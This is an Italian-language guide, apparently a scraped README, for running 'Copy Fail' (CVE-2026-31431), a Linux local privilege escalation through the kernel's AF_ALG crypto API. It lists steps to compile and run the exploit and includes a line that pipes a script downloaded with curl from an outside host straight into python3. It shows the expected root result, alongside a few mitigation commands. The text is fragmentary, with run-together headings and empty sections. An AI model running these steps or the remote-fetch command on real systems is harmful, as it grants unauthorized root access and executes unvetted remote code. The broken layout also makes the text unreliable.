
La maggior parte delle LPE su Linux richiede una finestra di race o un offset specifico del kernel. Copy Fail è un difetto logico lineare, non necessita di nessuno dei due. Lo stesso script Python di 732 byte (o .c elf) fornisce i privilegi di root su ogni distribuzione Linux rilasciata dal 2017.
Questo contenuto è destinato esclusivamente a scopi educativi e di test di sicurezza autorizzati. NON eseguirlo su sistemi senza autorizzazione esplicita.
Copy Fail (CVE-2026-31431) è una vulnerabilità di escalation dei privilegi locali (LPE) su Linux che interessa l'API crittografica del kernel tramite AF_ALG.
Consente a un utente non privilegiato di sovrascrivere i dati della page cache di un binario SUID (ad es. /usr/bin/su) e ottenere accesso root.
AF_ALG abilitatoalgif_aead caricatoos.splicesocket(AF_ALG)uname -a
grep -i authencesn /proc/crypto
lsmod | grep alg
Indicatori attesi:
authencesn(hmac(sha256),cbc(aes))algif_aead caricatopython3 copy_fail_exp.py
curl https://copy.fail/exp | python3
su
id
Risultato atteso:
uid=0(root)
os.splice not foundCausa:
Soluzione:
gcc copy_fail_exp.c -o copy_fail
chmod +x copy_fail
./copy_fail
su
Possibili cause:
Installa gli strumenti necessari:
apt update && apt install build-essential
dmesg | grep -i alg
lsmod | grep algif_aead
echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
rmmod algif_aead
Aggiorna il tuo sistema:
apt update && apt upgrade
Se l'exploit fallisce, considera:
Utilizza questo exploit in modo responsabile solo in laboratori, CTF e test di penetrazione autorizzati.